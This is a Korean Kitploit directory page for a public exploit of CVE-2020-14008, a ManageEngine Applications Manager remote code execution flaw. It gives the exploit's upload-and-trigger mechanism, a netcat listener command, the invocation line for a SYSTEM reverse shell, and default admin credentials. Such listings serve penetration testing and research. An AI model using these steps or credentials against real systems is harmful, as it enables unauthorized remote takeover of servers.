Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE | Kitploit
도구/GitHubGitHub/0x0d3ad/cve-2020-14008
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

저장소 보기
3124개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-14008 - ManageEngine Applications Manager RCE

Zoho ManageEngine Applications Manager에서 인증된 사용자를 통한 원격 코드 실행 (임의 파일 업로드) (버전 <= 14720).

취약점 요약

세부사항값
CVECVE-2020-14008
CVSS7.2 (높음)
유형인증된 RCE / 임의 파일 업로드
제품Zoho ManageEngine Applications Manager
영향 받는 버전버전 14720 이하
요구 사항유효한 관리자 자격 증명
결과SYSTEM 권한의 리버스 셸

이 익스플로잇은 Weblogic 모니터 자격 증명 테스트 기능을 악용합니다. 인증된 관리자가 악성 weblogic.jar 파일을 예상되는 Weblogic 라이브러리 경로에 업로드합니다. 자격 증명 테스트가 트리거되면 ManageEngine은 JarLoader.loadClass() 및 newInstance()를 통해 업로드된 JAR에서 weblogic.jndi.Environment를 로드하여 임의 Java 코드를 실행합니다.

요구 사항

시스템

  • Python 3.x
  • Java JDK (javac 및 jar이 PATH에 있어야 함)
  • 리버스 셸 수신을 위한 nc (netcat)

Python 종속성

pip3 install requests urllib3 lxml

사용법

1. 리스너 시작

nc -lvnp 1337

2. 익스플로잇 실행

python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

예제

# Basic
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

익스플로잇 흐름

  1. 로그인 - 관리자 자격 증명으로 인증, 세션 쿠키 획득
  2. 열거 - ManageEngine 기본 설치 디렉터리 검색
  3. JAR 빌드 - 리버스 셸을 포함한 악성 Java 클래스(weblogic.jndi.Environment)를 컴파일하여 weblogic.jar로 생성
  4. 업로드 - 디렉터리 트래버설을 통해 classes/weblogic/version8/ 경로에 JAR 업로드 (대체: 이동을 위한 예약 작업 생성)
  5. 트리거 - /testCredential.do에서 Weblogic 자격 증명 테스트 호출, 악성 클래스 로드 및 인스턴스화
  6. 셸 - 리버스 셸이 리스너로 연결

기본 자격 증명

사용자명비밀번호
adminadmin
adminpassword
administratoradministrator
guestguest

문제 해결

오류해결 방법
release version 7 not supportedJava 21+에서 Java 7 타겟을 제거했습니다. 스크립트는 --release 8을 사용합니다.
FileNotFoundError: weblogic.jarJAR 컴파일 실패. javac와 jar이 PATH에 있는지 확인하세요.
No valid response from used session잘못된 자격 증명
Actionname not found작업 생성 실패, 관리자 권한을 확인하세요.

참고 문헌

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • ManageEngine 보안 권고

면책 조항

이 도구는 허가된 침투 테스트 및 보안 연구 목적으로만 제공됩니다. 귀하가 소유하거나 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다.

도구 다운로드